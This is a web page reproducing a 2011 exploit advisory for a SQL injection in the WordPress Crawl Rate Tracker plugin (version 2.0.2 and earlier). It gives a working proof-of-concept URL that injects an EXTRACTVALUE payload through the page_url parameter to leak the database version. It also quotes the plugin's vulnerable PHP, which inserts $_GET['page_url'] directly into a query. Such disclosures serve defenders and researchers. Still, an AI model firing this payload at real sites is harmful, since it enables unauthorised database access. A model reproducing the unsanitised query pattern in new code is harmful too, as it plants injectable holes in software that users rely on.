扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 |
# Exploit Title: WordPress Crawl Rate Tracker plugin <= 2.0.2 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/crawlrate-tracker.2.02.zip # Version: 2.0.2 (tested) # Note: magic_quotes has to be turned off --- PoC --- http://www.site.com/wp-content/plugins/crawlrate-tracker/sbtracking-chart-data.php?chart_data=1&page_url=-1' AND EXTRACTVALUE(1, CONCAT(CHAR(58),@@version,CHAR(58)))--%20 --------------- Vulnerable code --------------- class b3_chartData extends b3_sbTrackingConfig { public function tracking_bot_report_chart_data() { ... if($_GET['page_url'] != '') { $bots = $this->wpdb->get_results("SELECT DATE(FROM_UNIXTIME(<code>visit_time</code>)) <code>visit_date</code>,<code>robot_name</code>,COUNT(*) <code>total</code> FROM $this->sbtracking_table WHERE <code>visit_time</code> >= '$start' AND <code>visit_time</code> <= '$end' AND <code>page_url</code> = '" . $_GET['page_url'] . "' GROUP BY <code>visit_date</code>,<code>robot_name</code>"); ... if ($_GET['chart_data']==1) { ... $chartData = new b3_chartData(); echo $chartData->tracking_bot_report_chart_data(); |
体验盒子
